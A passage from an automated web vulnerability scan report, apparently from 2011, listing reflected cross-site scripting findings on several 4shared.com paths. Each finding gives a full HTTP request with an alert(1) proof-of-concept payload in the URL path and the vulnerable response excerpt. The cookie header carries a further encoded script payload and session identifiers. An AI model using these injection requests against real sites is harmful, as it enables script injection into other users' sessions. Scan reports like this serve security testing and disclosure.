Request

GET /maine2f76'-alert(1)-'8d035ece632/translate/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /maine2f76'-alert(1)-'8d035ece632/translate/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4FBB323F22B075A6B58B7D300F6E5194.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:06 GMT
Connection: close
Content-Length: 36182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/maine2f76'-alert(1)-'8d035ece632/translate/setLang.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.303. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11c9c"-alert(1)-"b3e63033d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6E0A71945AFFA927BE3920160757DB9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:11 GMT
Connection: close
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.304. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56164'-alert(1)-'e59bf9897c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/translate56164'-alert(1)-'e59bf9897c2/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate56164'-alert(1)-'e59bf9897c2/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EB1DEC4AFA3D47FE9BBF924387ED2ABB.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:12 GMT
Connection: close
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/main/translate56164'-alert(1)-'e59bf9897c2/setLang.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.305. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8bf5'-alert(1)-'195beba29eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/translate/setLang.jspd8bf5'-alert(1)-'195beba29eb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate/setLang.jspd8bf5'-alert(1)-'195beba29eb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DEBA8EE33462A5DE81412095A858751D.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:22 GMT
Connection: close
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/main/translate/setLang.jspd8bf5'-alert(1)-'195beba29eb',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.306. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77fc0"-alert(1)-"030cd898f55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87EA3869ED34688155236636B5D3476F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:21 GMT
Connection: close
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.307. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17562"-alert(1)-"aa3f9a7695c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8154EA1F3F4FF79D5646E442478F4DB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

1.308. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9050f'-alert(1)-'da1217b2063 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oauth9050f'-alert(1)-'da1217b2063/startFacebookLogin.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth9050f'-alert(1)-'da1217b2063/startFacebookLogin.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9918604EF48A73BA8DD8B344BA91ADFD.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/oauth9050f'-alert(1)-'da1217b2063/startFacebookLogin.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.309. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12066'-alert(1)-'1e398f09083 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oauth/startFacebookLogin.jsp12066'-alert(1)-'1e398f09083 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth/startFacebookLogin.jsp12066'-alert(1)-'1e398f09083
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=14709AA393D94F8BC360242100B613DA.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:51 GMT
Connection: close
Content-Length: 36203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/oauth/startFacebookLogin.jsp12066'-alert(1)-'1e398f09083',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.310. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4481d"-alert(1)-"c7de45f4dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621C418861194619D182939BF9069DC2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.311. http://www.4shared.com/premium.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2ec"-alert(1)-"e169cb5f37d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /premium.jspcb2ec"-alert(1)-"e169cb5f37d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /premium.jspcb2ec"-alert(1)-"e169cb5f37d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A92818CFB6F551716E7018166B205B6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:00 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jspcb2ec"-alert(1)-"e169cb5f37d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.312. http://www.4shared.com/premium.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e98a3'-alert(1)-'fb781f2e6d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /premium.jspe98a3'-alert(1)-'fb781f2e6d4 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /premium.jspe98a3'-alert(1)-'fb781f2e6d4
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=72B44868C6D9960DB8C034F7D0091DA4.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:01 GMT
Connection: close
Content-Length: 36107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/premium.jspe98a3'-alert(1)-'fb781f2e6d4',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.313. http://www.4shared.com/press_room/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/press_room/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94440"-alert(1)-"30c8fdbfe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room94440"-alert(1)-"30c8fdbfe4/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /press_room94440"-alert(1)-"30c8fdbfe4/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D48B010F53E401E07A710D3F1BC1A7B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:13 GMT
Connection: close
Content-Length: 36102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/press_room94440"-alert(1)-"30c8fdbfe4/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.314. http://www.4shared.com/press_room/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/press_room/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 972d4'-alert(1)-'1a3a2fd3041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room972d4'-alert(1)-'1a3a2fd3041/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

